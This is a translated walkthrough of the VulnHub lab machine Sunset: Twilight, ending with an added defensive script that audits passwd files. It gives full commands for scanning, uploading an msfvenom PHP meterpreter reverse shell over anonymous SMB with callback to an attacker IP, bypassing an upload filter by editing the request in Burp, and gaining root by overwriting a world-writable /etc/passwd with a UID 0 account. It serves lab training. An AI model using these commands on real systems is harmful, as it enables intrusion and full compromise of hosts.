PJzhang: vulnhub target machine, sunset series, SUNSET: TWILIGHT

猫宁~~~

Address: https://www.vulnhub.com/entry/sunset-twilight,512/

The focus here is on the tools and the approach.

nmap 192.168.43.0/24
Target machine IP
192.168.43.164

nmap -A -p1-65535 192.168.43.164

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later

enum4linux 192.168.43.164
WRKSHARE Disk Workplace Share. Do not access if not an employee.

smbclient //192.168.43.164/WRKSHARE, log in without a password
smb: \>
cd var\www\html
smb: \var\www\html\>

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php

Upload muma.php over smb
smb: \var\www\html\> put muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

Visit http://192.168.43.164/muma.php to get the reverse shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$

cd /home
This shows that a user named miguel exists
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash

ls -al /etc/passwd, the file is readable and writable
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

Run on the attacking machine
openssl passwd -1 -salt useruser 123456

Copy the target machine's /etc/passwd to the local machine
Append this as the last line
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash

python3 -m http.server 80

wget http://192.168.43.154/passwd -O /etc/passwd

su useruser
id
uid=0(root) gid=0(root) groups=0(root)
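
The escalation above worked because /etc/passwd was mode 777 and because a password hash placed in field 2 of a UID 0 entry is honoured. As an added example (not part of the original post), the script below audits a passwd-format file for exactly those conditions; the function names, the "extra" account and its hash are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original post): audit a passwd-format file for
# the conditions the escalation above depended on. Prints one finding per line.
audit_passwd() {
    file=$1

    # Writable by group or others: any local account can add or edit entries.
    if [ -n "$(find "$file" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
        echo "PERM: $file is writable by group or others"
    fi

    # Fields: name:password:uid:gid:gecos:home:shell
    awk -F: '
        $0 == "" { next }
        # Any account other than root with UID 0 has full root rights.
        $3 ~ /^0+$/ && $1 != "root" { print "UID0: account " $1 " has UID 0" }
        # With shadow passwords, field 2 is "x" (or locked with * or !).
        $2 == "" { print "EMPTY: account " $1 " has no password"; next }
        $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            print "HASH: account " $1 " has a password hash in the passwd file"
        }
    ' "$file"
}

# Constructed sample: the miguel entry is from the page, the "extra" entry and
# its hash are made-up placeholders; mode 777 mirrors the listing on the page.
make_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
extra:$1$salt$CONSTRUCTEDPLACEHOLDERHASH:0:0:root:/root:/bin/bash
EOF
    chmod 777 "$1"
}

tmp=$(mktemp -d)
make_sample "$tmp/passwd"
audit_passwd "$tmp/passwd"
rm -rf "$tmp"
```

On a correctly configured host (root:root, mode 644, only root with UID 0, every password field "x"), audit_passwd /etc/passwd prints nothing.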

Getting a shell through the upload interface

dirb http://192.168.43.3/

http://192.168.43.3/gallery/

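http://192.168.43.3/gallery/original/ allows browsing the file directory, for example the uploaded muma.php

Rename muma.php to muma.php.pjpeg

Upload it and capture the request with burpsuite,
Content-Type: image/jpeg
Change the file name back to muma.php

The upload succeeds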

http://192.168.43.3/gallery/original/muma.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

Shell obtained successfully

Original article: https://www.cnblogs.com/landesk/p/13688068.html